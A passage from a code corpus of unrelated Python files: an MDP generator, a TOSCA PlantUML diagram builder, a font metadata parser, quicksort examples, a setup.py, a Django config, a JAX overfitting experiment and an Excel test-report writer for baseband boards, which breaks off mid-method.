transition_matrix = jnp.swapaxes(transition_matrix, 0, 1)
# Restructure for structure.MarkovDecisionProcess (A, S) vs (S, A).
reward_matrix_marginalized = jnp.swapaxes(reward_matrix_marginalized, 0, 1)
return structure.MarkovDecisionProcess(
transitions=np.array(transition_matrix, dtype=dtype),
rewards=np.array(reward_matrix_marginalized, dtype=dtype),
name=f'GARET S:{num_states} A:{num_actions} B:{branching_factor} K:{rng_key} D:{dtype.__name__}')
GARET1 = functools.partial(create,
seed=42,
num_states=4,
num_actions=4,
branching_factor=3)
GARET2 = functools.partial(create,
seed=42,
num_states=4,
num_actions=20,
branching_factor=3)
GARET3 = functools.partial(create,
seed=42,
num_states=10,
num_actions=2,
branching_factor=3)
GARET_100 = functools.partial(create,
seed=42,
num_states=100,
num_actions=2,
branching_factor=3)
|
#! /usr/bin/env python3
######################################################################
#
# TOSCA Implementation Landscape
# Copyright (c) 2021 Inria
#
# This software is distributed under the Apache License 2.0
# the text of which is available at http://www.apache.org/licenses/LICENSE-2.0
# or see the "LICENSE-2.0.txt" file for more details.
#
# Author: Philippe Merle <philippe.merle@inria.fr>
#
######################################################################
import sys
import yaml
# Mapping of activity levels to PlantUML colors
COLORS = {
"ACTIVE": "PaleGreen",
"SLEEPING": "Orange",
"INACTIVE": "DarkRed",
"UNKNOWN": "White",
}
# Iconifiable labels
ICONS = [
"Eclipse",
"Forge",
"GitHub",
"SaaS",
"Spec",
"Website",
]
# Criteria
CRITERIA = {
"Status": None,
"TOSCA": { "sep": " + " },
"Target": { "sep": " + " },
"Usage": { "sep": " + " },
"Nature": { "sep": "\\n" },
"Language": { "sep": " + " },
"Links": { "sep": " " },
}
# Mapping of relationships to PlantUML arrows
RELATIONSHIPS = {
"contributes": "o--",
"hosts": "*-up-",
"uses": "..>",
"plugins": "<..",
"same ecosystem": "--",
"applied to": "..up..>",
}
# Arrows to force the PlantUML layout
ARROWS_TO_FORCE_THE_LAYOUT = [
"TOSCA_toolbox .up[hidden]. Cloudnet_TOSCA_Toolbox",
"Heat_Translator .up[hidden]. tosca_parser",
"Heat_Translator .up[hidden]. tosca_parser",
]
# Vertical layout of categories
LAYOUT_OF_CATEGORIES = [
"Open Standards",
"EU Funded Projects",
"TOSCA Modeling Tools",
"TOSCA Marketplaces",
"TOSCA Orchestrators",
"TOSCA Developer Tools",
"Open Source Communities",
]
def to_id(label):
for s in [' ', '.', '-']:
label = label.replace(s, '_')
return label
def serialize(data, iconable=False, sep=None):
if isinstance(data, float):
return str(data)
elif isinstance(data, str):
if iconable and data in ICONS:
return "<img:icons/%s.png{scale=0.5}>" % data
if data.endswith("\n"):
data = data[:-1]
return data.replace("\n", "\\n")
elif isinstance(data, list):
result = ''
s = ''
for d in data:
if d != None:
result += s + serialize(d, iconable=True)
s = sep
else:
result += " +\\n"
s = ''
return result
elif isinstance(data, dict):
result = ''
s = ''
for k, v in data.items():
result += s + "[[" + serialize(v, False) + " " + serialize(k, True) + "]]"
s = sep
return result
def generate_category(category_name, category_values, arrows, indent=''):
print(indent, 'package "**%s**" as %s {' % (category_name, to_id(category_name)), sep='', file=output_stream)
lindent = indent + " "
for impl_name, impl_values in category_values.items():
if impl_name == "categories":
for k, v in impl_values.items():
generate_category(k, v, arrows, lindent)
continue # skip to the next implementation
status = impl_values["Status"]
print(lindent, 'map "**%s**" as %s #%s {' % (impl_name, to_id(impl_name), COLORS[status]), sep='', file=output_stream)
for criteria_name, criteria_value in impl_values.items():
line = " " + criteria_name + " => "
if criteria_name == "Status":
continue # skip it as already handled
elif criteria_name in CRITERIA:
line += serialize(criteria_value, sep=CRITERIA[criteria_name]["sep"])
elif criteria_name in RELATIONSHIPS:
source_id = to_id(impl_name)
arrow = RELATIONSHIPS[criteria_name]
for target in criteria_value:
arrows.append("%s %s %s : <<%s>>" % (source_id, arrow, to_id(target), criteria_name))
continue # skip next print
print(lindent, line, sep='', file=output_stream)
print(lindent, "}", sep='', file=output_stream)
print(indent, "}", sep='', file=output_stream)
# Main program
filename = sys.argv[1]
print("Load", filename)
with open(filename) as input_stream:
dataset = yaml.load(input_stream)
filename = filename[:filename.rindex('.')] + ".puml"
print("Generate", filename)
with open(filename, 'w') as output_stream:
print("@startuml", file=output_stream)
print("Title **TOSCA Implementation Landscape**", file=output_stream)
arrows = []
for category_name, category_values in dataset.items():
generate_category(category_name, category_values, arrows)
arrows.extend(ARROWS_TO_FORCE_THE_LAYOUT)
previous_category = LAYOUT_OF_CATEGORIES[0]
for category in LAYOUT_OF_CATEGORIES[1:]:
arrows.append("%s --[hidden]-- %s" % (to_id(previous_category), to_id(category)))
previous_category = category
for arrow in arrows:
print(arrow, file=output_stream)
print("@enduml", file=output_stream)
|
import data.fonts.character
class MetaFile:
def __init__(self, file, text_mesh_creator):
self.PAD_TOP = 0
self.PAD_LEFT = 1
self.PAD_BOTTOM = 2
self.PAD_RIGHT = 3
self.DESIRED_PADDING = 3
self.SPLITTER = " "
self.NUMBER_SEPARATOR = ","
self.aspect_ratio = 800 / 600
# self.aspect_ratio = display.get_width() / display.get_height()
self.vertical_per_pixel_size = None
self.horizontal_per_pixel_size = None
self.space_width = None
self.padding = 0
self.padding_width = 0
self.padding_height = 0
self.meta_data = {}
self.values = {}
self.value_pairs = {}
self.file = open(file, 'r')
self.load_padding_data()
self.load_line_sizes(text_mesh_creator)
image_width = self.get_value_of_variable("scale_w")
self.load_character_data(image_width, text_mesh_creator)
self.file.close()
def get_space_width(self):
return self.space_width
def get_character(self, ascii):
return self.meta_data.get(ascii)
def process_next_line(self): # check if this is right
self.values.clear()
line = self.file.readline().strip()
if len(line) is 0:
return False
if line is not None:
for part in line.split(self.SPLITTER):
value_pairs = part.split("=")
if len(value_pairs) == 2:
self.values[value_pairs[0]] = value_pairs[1]
return True
def get_value_of_variable(self, variable):
return self.values[variable]
def get_values_of_variable(self, variable):
numbers = self.values[variable].split(self.NUMBER_SEPARATOR)
actual_values = numbers
for i in range(len(actual_values)):
# for i in range(len(actual_values) + 1):
actual_values[i] = numbers[i]
return actual_values
def load_padding_data(self):
self.process_next_line()
self.padding = self.get_values_of_variable("padding")
self.padding_width = self.padding[self.PAD_LEFT] + self.padding[self.PAD_RIGHT]
self.padding_height = self.padding[self.PAD_TOP] + self.padding[self.PAD_BOTTOM]
def load_line_sizes(self, text_mesh_creator):
self.process_next_line()
line_height_pixels = int(self.get_values_of_variable("line_height")[0]) - int(self.padding_height)
self.vertical_per_pixel_size = text_mesh_creator.LINE_HEIGHT / line_height_pixels
self.horizontal_per_pixel_size = self.vertical_per_pixel_size / self.aspect_ratio
def load_character_data(self, image_width, text_mesh_creator):
self.process_next_line()
self.process_next_line()
while self.process_next_line():
char = self.load_character(image_width, text_mesh_creator)
if char is not None:
self.meta_data[char.get_id()] = char
def load_character(self, image_size, text_mesh_creator):
id = int(self.get_value_of_variable("id"))
if id == text_mesh_creator.SPACE_ASCII:
self.space_width = (int(self.get_value_of_variable("xadvance")) - int(self.padding_width)) * \
self.horizontal_per_pixel_size
return None
x_texture = (int(self.get_value_of_variable("x")) + (int(self.padding[self.PAD_LEFT]) - self.DESIRED_PADDING)) / int(image_size)
y_texture = (int(self.get_value_of_variable("y")) + (int(self.padding[self.PAD_TOP]) - self.DESIRED_PADDING)) / int(image_size)
width = int(self.get_value_of_variable("width")) - (int(self.padding_width) - (2 * self.DESIRED_PADDING))
height = int(self.get_value_of_variable("height")) - (int(self.padding_height) - (2 * self.DESIRED_PADDING))
quad_width = width * self.horizontal_per_pixel_size
quad_height = height * self.vertical_per_pixel_size
x_texture_size = width / int(image_size)
y_texture_size = height / int(image_size)
x_offset = (int(self.get_value_of_variable("xoffset")) + int(self.padding[self.PAD_LEFT]) - self.DESIRED_PADDING) * self.horizontal_per_pixel_size
y_offset = (int(self.get_value_of_variable("yoffset")) + int(self.padding[self.PAD_TOP]) - self.DESIRED_PADDING) * self.vertical_per_pixel_size
x_advance = (int(self.get_value_of_variable("xadvance")) - int(self.padding_width)) * self.horizontal_per_pixel_size
return data.fonts.character.Character(id, x_texture, y_texture, x_texture_size, y_texture_size, x_offset, y_offset, quad_width, quad_height, x_advance)
|
from .code import qsort as sort_func
EXAMPLES = [
[],
[1],
[1, 2],
[2, 1],
[1, 1],
[1, 2, 3],
[1, 3, 2],
[2, 1, 3],
[2, 3, 1],
[3, 1, 2],
[3, 2, 1],
[1, 2, 2],
[1, 1, 2],
[1, 1, 1],
]
def print_examples():
for example in EXAMPLES:
try:
print(f"sort_func({str(example)}) = {str(sort_func(example))}")
except:
print(f"sort_func({str(example)}) => EXCEPTION RAISED")
if __name__ == "__main__":
print_examples()
|
# -*- coding: utf-8 -*-
import io
import ast
from re import compile
from setuptools import setup
def _get_version():
version_re = compile(r"__version__\s+=\s+(.*)")
with open("up2s3.py", "rb") as fh:
version = ast.literal_eval(
version_re.search(fh.read().decode("utf-8")).group(1)
)
return str(version)
def _get_author():
author_re = compile(r"__author__\s+=\s+(.*)")
mail_re = compile(r"(.*)\s<(.*)>")
with open("up2s3.py", "rb") as fh:
author = ast.literal_eval(
author_re.search(fh.read().decode("utf-8")).group(1)
)
mail = mail_re.search(author)
return (mail.group(1), mail.group(2)) if mail else (author, None)
def _get_readme():
with io.open("README.rst", "rt", encoding="utf8") as f:
return f.read()
version = _get_version()
(author, email) = _get_author()
setup(
name="up2s3",
version=version,
license="Apache 2.0",
author=author,
author_email=email,
description="Save uploaded pictures in AWS S3.",
long_description=_get_readme(),
url="https://github.com/sapicd/up2s3",
py_modules=[
"up2s3",
],
zip_safe=False,
install_requires=["boto3"],
)
|
from __future__ import unicode_literals
from django.apps import AppConfig
class ThreadsConfig(AppConfig):
name = 'threads'
|
from __future__ import absolute_import, division
from __future__ import print_function
import matplotlib.pyplot as plt
from jax.api import jit, grad
from jax.config import config
import jax.numpy as np
import jax.random as random
import numpy as onp
import sys
JAX_ENABLE_X64=True
np.set_printoptions(threshold=sys.maxsize)
def gen_data_y(params, inputs):
print("Generating Y data values: ")
for W, b in params:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs)
print("Max abs pure y generated: ", np.max(np.abs(outputs)))
return outputs
def gen_data_noise(key, params, inputs, noise_covariance):
print("Generating Y data noise: ")
for W, b in params:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs)
total_noise = outputs + random.multivariate_normal(key, np.zeros(outputs.shape[1]), noise_covariance, (outputs.shape[0],))
print("Sum noise model noise", np.sum(np.abs(outputs)))
print("Sum noise: ", np.sum(total_noise))
print("Abs Sum noise: ", np.sum(np.abs(total_noise)))
print("Noise shape:", total_noise.shape)
print("Max abs noise: ", np.max(np.abs(total_noise)))
return total_noise
def init_random_params(key, position, scale, layer_sizes):
"""Build a list of (weights, biases) tuples,
one for each layer in the net."""
return [(random.uniform(key, shape=(m,n), dtype=onp.float64, minval=-scale, maxval=scale)+position, #weight matrix
random.uniform(key, shape=(n,), dtype=onp.float64, minval=-scale, maxval=scale)+position) #bias vector
for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]
def sigmoid(x):
return np.where(x >= 0, 1/(1+np.exp(-x)), np.exp(x)/(1+np.exp(x)))
def softmax(x):
return np.exp(x-np.max(x, axis=1).reshape(x.shape[0],1))/np.sum(np.exp(x-np.max(x, axis=1).reshape(x.shape[0],1)), axis=1).reshape(x.shape[0],1)
def neural_net_predict(params, inputs):
"""Implements a deep neural network for classification.
params is a list of (weights, bias) tuples.
inputs is an (N x D) matrix."""
#print("Their params: ###########################################################################################")
#print(params)
for W, b in params:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs) # This doesn't affect the final output of the last layer
return outputs
def neural_net_predict_model(params, inputs):
"""Implements a deep neural network for classification.
params is a list of (weights, bias) tuples.
inputs is an (N x D) matrix."""
for W, b in params[0:len(params)-2]:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs) # This doesn't affect the final output of the last layer
for W, b in params[len(params)-2:]:
outputs = np.dot(inputs, W) + b
inputs = outputs
return outputs
def mean_square_error(params, inputs, targets):
net_out = neural_net_predict(params, inputs)
return (1/inputs.shape[0])*np.sum(np.power((net_out - targets),2))
def mean_square_error_model(params, inputs, targets):
net_out = neural_net_predict_model(params, inputs)
return (1/inputs.shape[0])*np.sum(np.power((net_out - targets),2))
def relative_error(params, inputs, targets):
net_out = neural_net_predict(params, inputs)
return np.mean(np.abs((net_out - targets)/targets))
def accuracy(params, inputs, targets):
target_class = np.argmax(targets, axis=1)
predicted_class = np.argmax(neural_net_predict(params, inputs), axis=1)
return np.mean(predicted_class == target_class)
def jeffreys_dist(model_params, true_params, train_data, train_labels, noise_covar, test_data, test_labels, itr):
model_like = np.sum(-(1/(2*noise_covar))*np.power(train_labels-neural_net_predict_model(model_params, train_data), 2))
true_like = np.sum(-(1/(2*noise_covar))*np.power(train_labels-neural_net_predict(true_params, train_data), 2))
return np.array([model_like, true_like])
def track_errors(model_params, train_data, train_labels, noise_covar, test_data, test_labels, itr):
train_model_error = np.mean(np.power(train_labels-neural_net_predict_model(model_params, train_data), 2))
test_model_error = np.mean(np.power(test_labels-neural_net_predict_model(model_params, test_data), 2))
rel_model_error = np.mean(np.abs(neural_net_predict_model(model_params, test_data) - test_labels/test_labels))
return np.array([train_model_error, test_model_error, rel_model_error])
def main():
# Hyper Parameters
true_param_scale = 1.5
net_param_scale = 1.0
noise_param_scale = 0.0
batch_size = 50
num_epochs = 300
#step_size = 0.0008 #0.0003 #*0.0005
track_file = open('trainings.txt', 'w')
for k in range(1000):
log_file = open('most_recent_log_' + str(k) + '.txt', 'w')
log_file.write("Model Likelihoods | True Likelihoods | Train Errors | Test Errors\n")
print("Training ", k)
key = random.PRNGKey(onp.random.randint(0,100000000))
# Model parameters
true_net_size = onp.random.randint(5,15)
print("True net size: ", true_net_size)
model_net_size = onp.random.randint(true_net_size+5,25) # Make sure model is deeper than true net
print("Model net size: ", model_net_size)
noise_layers = [100, 1]
true_layers = onp.append(onp.random.randint(5,100, true_net_size), 1)
true_layers.sort()
true_layers = true_layers[::-1]
true_layers[0] = 100
print("True model layer sizes: ", true_layers)
layer_sizes = onp.append(onp.random.randint(true_layers[-2],100, model_net_size), 1) #Make sure model doesn't have smaller layers
layer_sizes.sort()
layer_sizes = layer_sizes[::-1]
layer_sizes[0] = 100
print("Train model layer sizes: ", layer_sizes)
true_param_position = random.uniform(key, shape=(1,), dtype=onp.float64, minval=-0.5, maxval=0.5) #*-0.5 0.5 #-1.0 1.0
print("True Params position: ", true_param_position)
true_model = init_random_params(key, true_param_position, true_param_scale, true_layers)
noise_model = init_random_params(key, 0.0, noise_param_scale, noise_layers)
print("Loading data...")
train_data = random.uniform(key, shape=(50,100), dtype=onp.float64, minval=0.0, maxval=1.0) #(500,100) maxval=1.0
test_data = random.uniform(key, shape=(1000,100), dtype=onp.float64, minval=0.0, maxval=1.0) #(500, 100) maxval=1.0
noise_covar = random.uniform(key, shape=(layer_sizes[-1],layer_sizes[-1]), dtype=onp.float64, minval=0.6, maxval=0.6)#0.2 0.2#0.4 0.4*
noise_for_train_labels = gen_data_noise(key, noise_model, train_data, noise_covar)
train_labels_clean = gen_data_y(true_model, train_data)
train_labels = train_labels_clean + noise_for_train_labels
test_labels = gen_data_y(true_model, test_data)
print("Test labels mean: ", np.mean(np.abs(test_labels)))
print("test labels abs max: ", np.max(np.abs(test_labels)))
print("Test labels variance: ", np.var(test_labels))
num_train = train_data.shape[0]
num_complete_batches, leftover = divmod(num_train, batch_size)
num_batches = num_complete_batches + bool(leftover)
def data_stream():
rng = onp.random.RandomState()
while True:
perm = rng.permutation(num_train)
for i in range(num_batches):
batch_idx = perm[i * batch_size:(i + 1) * batch_size]
yield train_data[batch_idx], train_labels[batch_idx]
batches = data_stream()
@jit
def update(params, batch, step_size):
grads = grad(mean_square_error_model)(params, batch[0], batch[1])
return [(w - step_size * dw, b - step_size * db) for (w, b), (dw, db) in zip(params, grads)]
likes_cross_points = np.array([])
error_turn_points = np.array([])
jeff_errors_list = np.array([])
diff_errors_list = np.array([])
min_test_errors = np.array([])
likes_diffs = np.array([])
rel_jeff_errors_list = np.array([])
rel_min_test_errors = np.array([])
rel_diff_errors_list = np.array([])
for step_size in [0.0008]: #onp.arange(0.0001, 0.0011, 0.0002):
print("Training with step_size: ", step_size)
params = init_random_params(key, 0.0, net_param_scale, layer_sizes)
model_likelihoods = np.array([])
true_likelihoods = np.array([])
train_errors = np.array([])
test_errors = np.array([])
relative_errors = np.array([])
print(" Epoch | Train loss | Test loss | Dist Train Loss | Dist Test Loss")
for i in range(1,num_epochs):
for _ in range(num_batches):
params = update(params, next(batches), step_size)
jd_point = jeffreys_dist(params, true_model, train_data, train_labels, noise_covar, test_data, test_labels, i)
err_point = track_errors(params, train_data, train_labels, noise_covar, test_data, test_labels, i)
model_likelihoods = np.append(model_likelihoods, jd_point[0])
true_likelihoods = np.append(true_likelihoods, jd_point[1])
train_errors = np.append(train_errors, err_point[0])
test_errors = np.append(test_errors, err_point[1])
relative_errors = np.append(relative_errors, err_point[2])
train_loss = mean_square_error_model(params, train_data, train_labels)
test_loss = mean_square_error_model(params, test_data, test_labels)
true_train_loss = mean_square_error(true_model, train_data, train_labels)
true_test_loss = mean_square_error(true_model, test_data, test_labels)
rel_train_loss = relative_error(params, train_data, train_labels)
rel_test_loss = relative_error(params, test_data, test_labels)
rel_true_train_loss = relative_error(true_model, train_data, train_labels)
rel_true_test_loss = relative_error(true_model, test_data, test_labels)
print("{:15}|{:20}|{:20}|{:20}|{:20}".format(i, train_loss, test_loss, true_train_loss, true_test_loss))
log_file.write(str(i)+","+str(train_loss)+","+str(test_loss)+","+str(true_train_loss)+","+str(true_test_loss)+
","+str(rel_train_loss)+","+str(rel_test_loss)+","+str(rel_true_train_loss)+","+str(rel_true_test_loss)+"\n")
log_file.flush()
like_diffs = np.abs(true_likelihoods - model_likelihoods)
likes_cross = np.argmin(like_diffs)
error_turn = np.argmin(test_errors)
jeff_error = test_errors[likes_cross]
min_test_error = test_errors[error_turn]
diff_errors = jeff_error - test_errors[error_turn]
rel_jeff_error = relative_errors[likes_cross]
min_rel_error = relative_errors[error_turn]
diff_rel_error = rel_jeff_error - relative_errors[error_turn]
likes_cross_points = np.append(likes_cross_points, likes_cross)
error_turn_points = np.append(error_turn_points, error_turn)
jeff_errors_list = np.append(jeff_errors_list, jeff_error)
diff_errors_list = np.append(diff_errors_list, diff_errors)
min_test_errors = np.append(min_test_errors, test_errors[error_turn])
likes_diffs = np.append(likes_diffs, like_diffs[likes_cross])
rel_jeff_errors_list = np.append(rel_jeff_errors_list, rel_jeff_error)
rel_min_test_errors = np.append(rel_min_test_errors, min_rel_error)
rel_diff_errors_list = np.append(rel_diff_errors_list, diff_rel_error)
print("Found likelihood cross point: ", likes_cross)
print("Found error min point: ", error_turn)
print("Difference in Jeffreys error and min error: ", diff_errors)
print("Minimum test error: ", test_errors[error_turn])
print("Difference in likelihoods at cross point: ", like_diffs[likes_cross])
print("Jeffreys Relative Error: ", rel_jeff_error)
print("Minimum MSE point relative error: ", min_rel_error)
print("Difference in Jeffreys relative error and min MSE error point relative error: ", diff_rel_error)
best_test_error_training = np.argmin(min_test_errors)
print("List of minimum test errors: ", min_test_errors)
#print("Best training learning rate: ", onp.arange(0.0001, .0011, 0.0001)[best_test_error_training])
best_likes_cross = likes_cross_points[best_test_error_training]
best_error_turn = error_turn_points[best_test_error_training]
best_diff_errors = diff_errors_list[best_test_error_training]
best_min_test_error = min_test_errors[best_test_error_training]
best_likes_diff = likes_diffs[best_test_error_training]
best_rel_jeff_error = rel_jeff_errors_list[best_test_error_training]
best_min_rel_error = rel_min_test_errors[best_test_error_training]
best_rel_diff_error = rel_diff_errors_list[best_test_error_training]
training_data_variance = np.var(train_labels_clean)
noise_for_train_data_variance = np.var(noise_for_train_labels)
test_data_variance = np.var(test_labels)
print("Found best likelihood cross point: ", best_likes_cross)
print("Found best error min point: ", best_error_turn)
print("Best difference in Jeffreys error and min error: ", best_diff_errors)
print("Best minimum test error: ", best_min_test_error)
print("Best difference in likelihoods at cross point: ", best_likes_diff)
track_file.write(str(k) + "," + str(best_likes_cross) + "," + str(best_error_turn) + "," + str(best_diff_errors) + ","
+ str(best_min_test_error) + "," + str(best_likes_diff) + "," + str(true_net_size) + "," + str(model_net_size) +
"," + str(best_rel_jeff_error) + "," + str(best_min_rel_error) + "," + str(best_rel_diff_error) + "," +
str(training_data_variance) + "," + str(test_data_variance) + "," + str(noise_for_train_data_variance) + "\n")
track_file.flush()
log_file.close()
if __name__ == '__main__':
main()
|
# coding:utf-8
import logging
import time
import xlwings as xw
import pandas as pd
import re
import datetime
import pythoncom
logger = logging.getLogger('ghost')
class BoardExcel(object):
'''
基带板测试模板
'''
sheets_name = ['整机设定', '定标', '灵敏度', '搜网', '自激']
dl_keywords = ['基带设定', '输出功率测试', 'EVM测试', 'ACPR测试',
'占用带宽测试', '频偏测试', '峰均比测试'] # 下行测试各小表的关键字
suffix = ['开始', '结束']
dl_rows = dict()
jump_row = 3 # 每张小表的开头3行跳过标题
def open_excel(self, path):
try:
pythoncom.CoInitialize()
print('open_excel={}'.format(path))
self.app = xw.App(visible=False, add_book=False)
self.app.display_alerts = False
self.app.screen_updating = False
self.wb = self.app.books.open(r'{}'.format(path))
# self.wb = xw.Book(r'{}'.format(path))
return True
except Exception as e:
logger.error(e)
raise NotImplementedError('no excel file')
def get_first_cell(self, shtname):
'''
获得所有行的第一个单元格内容
:return:
'''
sht = self.wb.sheets(shtname)
rowcount = sht.api.UsedRange.Rows.count
rng = sht.range('A1:A{}'.format(rowcount))
lst = rng.value
return lst
def get_lowtemp_level_rows(self):
'''
获得低温档位输出值表的行所在行数
:return:
'''
shtname = self.sheets_name[1]
cell_lst = self.get_first_cell(shtname) # 所有行首列单元格列表
band_rows = dict()
for idx, cell in enumerate(cell_lst):
if cell is None:
continue
band_rows.setdefault(cell.upper(), idx + 1)
self.ll_rows = band_rows
def get_normaltemp_level_rows(self):
'''
获得常温档位输出值表的行数
:return:
'''
shtname = self.sheets_name[2]
cell_lst = self.get_first_cell(shtname) # 所有行首列单元格列表
band_rows = dict()
for idx, cell in enumerate(cell_lst):
if cell is None:
continue
band_rows.setdefault(cell.upper(), idx + 1)
self.nl_rows = band_rows
def get_hightemp_level_rows(self):
'''
获得高温档位输出值表的行数
'''
shtname = self.sheets_name[3]
cell_lst = self.get_first_cell(shtname) # 所有行首列单元格列表
band_rows = dict()
for idx, cell in enumerate(cell_lst):
if cell is None:
continue
band_rows.setdefault(cell.upper(), idx + 1)
self.hl_rows = band_rows
def get_dl_rows(self):
'''
获得下行所有关键字对应的小表的行号
:return:
'''
ul_shtname = self.sheets_name[1]
cell_lst = self.get_first_cell(ul_shtname)
item_idx = {k: [] for k in self.dl_keywords}
for idx, item in enumerate(cell_lst):
if item is None:
continue
for keyword in self.dl_keywords:
startkeyword = keyword + self.suffix[0]
endkeyword = keyword + self.suffix[1]
if startkeyword in item:
item_idx[keyword].append(idx + 1 + 1)
if endkeyword in item:
item_idx[keyword].append(idx)
self.dl_rows = item_idx
def get_set_condition(self, cellid):
'''
cellid:0/1
获取下行设定条件:测试板子类型,band,默认板子类型只有一种,要不都是8125,要不都是T2K
:return:
'''
try:
rows = self.dl_rows['基带设定']
sht = self.wb.sheets(BoardExcel.sheets_name[1])
startrow = rows[0] + 2
endrow = rows[1]
celllst = sht.range('A{}:G{}'.format(startrow, endrow)).value
type = ''
cellstr = 'cell{}'.format(cellid)
bandstr = ''
freqpoint_dict = dict() # 高中低频点
freq_dict = dict() # 高中低频率
for itemlst in celllst:
for idx, item in enumerate(itemlst):
if item is None:
if idx % 2 != 0:
freqpoint_dict.setdefault(bandstr, []).append(None)
else:
freq_dict.setdefault(bandstr, []).append(None)
continue
if idx == 0:
temp = item.strip().split('_')
type = temp[0].upper()
thiscell = temp[2].lower()
bandstr = temp[3].upper()
if thiscell != cellstr:
break
continue
if idx % 2 != 0:
freqpoint_dict.setdefault(bandstr, [])
freqpoint_dict[bandstr].append(item)
else:
freq_dict.setdefault(bandstr, [])
freq_dict[bandstr].append(item)
return freqpoint_dict, freq_dict
except Exception as e:
raise RuntimeError('get_set_condition error:{}'.format(e))
def get_id(self):
'''
获取基带板id
:return:str
'''
try:
sht = self.wb.sheets(BoardExcel.sheets_name[0])
a1 = sht.range('B1').value
a2 = sht.range('B2').value
arm_ver = str(a1).strip()
bb_ver = str(a2).strip()
return arm_ver, bb_ver
except Exception as e:
raise ValueError('get_id error:{}'.format(e))
finally:
self.close_file()
def write_bbver_sn(self, bbver, sn):
try:
logger.debug('write_bbver_sn')
sht = self.wb.sheets(BoardExcel.sheets_name[0])
sht.range('B1').value = sn
sht.range('B2').value = bbver
today = datetime.date.today().strftime('%y-%m-%d') # 返回字符串
sht.range('B5').value = today
except Exception as e:
raise ValueError('get_id error:{}'.format(e))
else:
self.wb.save()
finally:
self.close_file()
def get_offset(self):
'''
获取衰减补偿值
:return:
'''
try:
sht = self.wb.sheets(BoardExcel.sheets_name[1])
a1 = sht.range('B1').value
offset = str(a1).strip()
return offset
except Exception as e:
raise ValueError('get_offset error:{}'.format(e))
finally:
self.close_file()
def get_band_dl_para(self):
'''
获取基带设定条件
:return:dataframe
'''
try:
rows = self.dl_rows['基带设定']
sht = self.wb.sheets(BoardExcel.sheets_name[0])
startrow = rows[0]
endrow = rows[1]
df = sht.range('A{}:G{}'.format(startrow, endrow)).options(pd.DataFrame, header=2).value
df.columns = [['高', '高', '中', '中', '低', '低'], ['频点', '下行频率', '频点', '下行频率', '频点', '下行频率']]
return df
except Exception as e:
raise ValueError('get_band_dl_para error:{}'.format(e))
def get_txatt_norm(self, cell_band):
'''
获取TXATT的指标规范
:return:list [下限,标准值,上限]
'''
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['输出功率测试']
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
row_idx = row_dict[str(cell_band).upper()]
startrow = row_idx
dt = sht.range('C{}:E{}'.format(startrow, startrow)).value # 返回列表
return dt
except Exception as e:
raise NotImplementedError('get_txatt_norm error:{}'.format(e))
def write_max_txatt(self, temp=1, **kwargs):
'''
更新最大档位输出值
temp:0,1,2
kwargs:{'CELL0_E':[[],[],[]],}
:return:
'''
logger.debug('write_max_txatt={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['输出功率测试']
temp_rows = [['G', 'H', 'I'], ['K', 'L', 'M'], ['O', 'P', 'Q']] # 低温,常温,高温所在列
value_row_base, _, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
norm_list = self.get_norm(shtname, rows[0] + self.jump_row)
for key, item in kwargs.items():
row_idx = row_dict[key.upper()]
row_range = value_row_base + str(row_idx)
norm_range = norm_row_base + str(row_idx)
lst = []
norm_lst = []
for each in item:
if each is not None:
power, txatt = each
ret = self.set_ccdf_colusition(power, norm_list)
norm_lst.append(ret)
lst.append([str(power), str(txatt * 100)])
else:
norm_list.append(None)
lst.append([None, None])
sht.range('{}'.format(row_range)).options(expand='table').value = lst
sht.range('{}'.format(norm_range)).options(transpose=True).value = norm_lst
except Exception as e:
logger.error('write_max_txatt error:{}'.format(e))
else:
self.wb.save()
def write_cali(self, temp=1, **kwargs):
'''
写入功率补偿值
kwargs:{'':[高频点补偿,中频点补偿,低频点补偿]}
:return:
'''
logger.debug('write_cali={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['输出功率测试']
temp_rows = ['F', 'J', 'N'] # 低温,常温,高温所在列
value_row_base = temp_rows[int(temp)] # 常温结果所在列
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
for key, item in kwargs.items():
row_idx = row_dict[key.upper()]
row_range = value_row_base + str(row_idx)
sht.range('{}'.format(row_range)).options(transpose=True).value = item
except Exception as e:
logger.error('write_cali error:{}'.format(e))
else:
self.wb.save()
def get_each_cellband_row(self, shtname, start, end):
'''
获得每个子表的cell_band的所在行
:return:{'CELL0_E':68}
'''
sht = self.wb.sheets(shtname)
rng = sht.range('A{}:A{}'.format(start, end))
lst = rng.value
cell_dict = {} # {}
for idx, cell in enumerate(lst):
if cell is None:
continue
cell = cell.upper()
newcell = cell[cell.rfind('CELL'):] # 原本每行标题是8125_0_CELL0_E,现在截取了CELL0_E
cell_dict.setdefault(newcell, idx + start)
return cell_dict
def write_ACPR(self, temp=1, **kwargs):
'''
更新ACPR
:param kwargs:{'cell0_E':[(txatt,power,adj_lower,adj_upper),(),()]}
:return:
'''
# logger.debug('write_ACPR={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['ACPR测试']
temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']] # 低温,常温,高温所在列
value_row_base, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
norm_list = self.get_norm(shtname, rows[0] + self.jump_row)
for key, item in kwargs.items():
row_idx = row_dict[key.upper()]
row_range = value_row_base + str(row_idx)
norm_range = norm_row_base + str(row_idx)
lst = []
norm_lst = []
for each in item:
_, _, adj_lower, adj_upper = each
ret = self.set_ACPR_colusition([adj_lower, adj_upper], norm_list)
norm_lst.append(ret)
lst.append('{}/{}'.format(adj_lower, adj_upper))
sht.range('{}'.format(row_range)).options(transpose=True).value = lst
sht.range('{}'.format(norm_range)).options(transpose=True).value = norm_lst
except Exception as e:
